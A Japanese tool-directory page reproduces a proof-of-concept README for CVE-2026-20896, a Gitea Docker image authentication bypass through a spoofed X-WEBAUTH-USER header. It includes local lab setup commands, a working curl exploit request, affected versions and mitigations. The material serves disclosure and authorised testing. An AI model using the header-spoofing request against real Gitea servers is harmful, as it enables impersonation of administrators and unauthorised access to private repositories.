Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-20896 — Gitea Dockerイメージ認証バイパス | Kitploit
ツール/GitHubGitHub/eqstlab/cve-2026-20896
認証と認可脆弱性分析エクスプロイトウェブセキュリティ
GitHubeqstlab/cve-2026-20896

CVE-2026-20896

Gitea Dockerイメージ認証バイパス

リポジトリを見る
131ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-20896: Gitea Docker イメージ認証バイパス PoC

[!WARNING] この PoC はローカルラボまたは明示的にテストを許可されたシステムでのみ使用してください。

https://github.com/user-attachments/assets/b73af2fe-0e59-438b-80d6-be93fd75697b

概要

CVE-2026-20896 は、影響を受ける公式 Gitea Docker イメージにおける認証バイパスです。リバースプロキシ認証が有効な場合、イメージが生成する REVERSE_PROXY_TRUSTED_PROXIES = * 設定により、Gitea バックエンドに到達できるクライアントが X-WEBAUTH-USER ヘッダーを通じて既存ユーザーになりすますことができます。

このラボは、ランダムなパスワードを持つ gitea-admin という管理者を作成し、CVE-2026-20896_AUTH_BYPASS_CONFIRMED をプライベートリポジトリ gitea-admin/private-proof に保存します。ランダムな管理者パスワードを知らずにそのファイルを読み取ることで、バイパスが実証されます。

影響を受けるバージョン

カテゴリバージョン
脆弱性あり公式 gitea/gitea Docker イメージ ≤ 1.26.2
最初の修正版1.26.3
推奨1.26.4 以降

脆弱な構成では、リバースプロキシ認証が有効であり、Gitea バックエンドに直接到達できること、またはアップストリームプロキシが攻撃者が指定した ID ヘッダーを保持することが必要です。このローカル再現にはリバースプロキシコンテナは不要です。

環境

root@kitploit:~
# ビルド
docker build -t cve-2026-20896-gitea-vuln .

# 実行
docker run -d --rm --name cve-2026-20896-gitea-vuln -p 127.0.0.1:3000:3000 cve-2026-20896-gitea-vuln

Gitea とプライベート証明リポジトリが初期化されるまで数秒待ちます。

PoC

cURL

root@kitploit:~
curl -s -L -H "X-WEBAUTH-USER: gitea-admin" http://127.0.0.1:3000/gitea-admin/private-proof/raw/branch/main/proof.txt

悪用に成功すると CVE-2026-20896_AUTH_BYPASS_CONFIRMED が返されます。

Python

root@kitploit:~
python poc.py http://127.0.0.1:3000

このスクリプトは、未認証・非管理者・偽装管理者のリクエストを比較し、認可バイパスが確認された場合に VULNERABLE を出力します。Python 3.10 以降が必要で、標準ライブラリのみを使用します。

影響

  • 既知または推測可能な Gitea ユーザーへのなりすまし
  • プライベートリポジトリおよびユーザーリソースへの不正アクセス
  • 管理者アカウントがなりすまされた場合の管理操作

緩和策

  • Gitea 1.26.3 以降にアップグレードしてください。1.26.4 以降を推奨します。
  • REVERSE_PROXY_TRUSTED_PROXIES を信頼できるプロキシアドレスに制限してください。
  • Gitea バックエンドへの直接アクセスを防ぎ、外部から供給される ID ヘッダーを上書きしてください。
  • 不要な場合はリバースプロキシ認証を無効にしてください。

クリーンアップ

root@kitploit:~
docker stop cve-2026-20896-gitea-vuln

参考情報

  • Gitea セキュリティアドバイザリ GHSA-f75j-4cw6-rmx4
  • Gitea 1.26.3 および 1.26.4 リリースのお知らせ
  • Gitea セキュリティ修正 PR #38151
ツールをダウンロード